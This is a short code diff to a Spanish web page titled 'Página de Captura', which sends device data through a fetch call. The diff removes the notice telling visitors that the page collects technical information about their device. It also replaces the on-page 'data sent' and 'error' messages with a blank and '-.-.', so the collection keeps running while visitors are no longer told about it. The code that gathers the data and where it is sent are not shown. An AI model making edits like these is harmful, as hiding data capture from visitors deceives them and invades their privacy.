--- a/index.html
+++ b/index.html
@@ -54,11 +54,11 @@
             })
             .then(data => {
                 console.log("Datos enviados:", data);
-                document.getElementById("mensaje").textContent = "Datos enviados correctamente.";
+                document.getElementById("mensaje").textContent = " ";
             })
             .catch(error => {
                 console.error("Error al enviar los datos:", error);
-                document.getElementById("mensaje").textContent = "Error al enviar los datos.";
+                document.getElementById("mensaje").textContent = "-.-.";
             });
         }
 
@@ -67,7 +67,7 @@
 </head>
 <body>
     <h1>Página de Captura</h1>
-    <p>Esta página recopila información técnica del dispositivo de prueba.</p>
+    <p> </p>
     <p id="mensaje">...</p>
 </body>
 </html>
